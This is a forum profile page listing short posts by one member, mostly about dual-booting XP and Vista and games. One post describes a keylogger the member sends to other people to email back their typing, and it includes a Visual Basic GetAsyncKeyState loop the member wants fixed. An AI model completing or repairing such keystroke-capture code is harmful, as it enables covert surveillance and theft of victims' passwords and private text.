Jump to content

cbox


cnkilla187

Members+
  • Posts

    10
  • Joined

  • Last visited

About cnkilla187

cnkilla187's Achievements

Apprentice Grade 2

Apprentice Grade 2 (3/44)

0

Reputation

  1. ya i made one of those but i want to make a newer better one
  2. i have another way but its not mine and its a ddl, do u know how i can open it and read it? or change it?
  3. ya it is i just didnt put that it was sorry any other ideas?
  4. iv made a key logger that u send to people, and it sends u a email with the stuff they type but it was made form lots of other peoples work that i put togeather from different programs anyway im redoing it completely and i need this code to work: Dim result As Integer Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer For i = 1 To 255 result = 0 result = GetAsyncKeyState(i) If result = -32767 Then TextBox1.Text = TextBox1.Text + Chr(i) End If Next i but it doesn't work on my vista 64 bit and i dont know how get it to work iv tried changing the user32 to user64 it don't work i think the GetAsyncKeyState Lib should be changed, but to what? if u can help it would be greatly appreciated
  5. can someone please give me the iso files for a xp boot disk i want to be able to dual boot xp and vista
  6. i love it but it isent as compatible as xp so thats why im just gonna dual boot xp when i need the compatibility
  7. look easy thanks for the program
  8. cnkilla187

    cod 4+5

    online of offline?
  9. that blue hurts my eyes lol
×
×
  • Create New...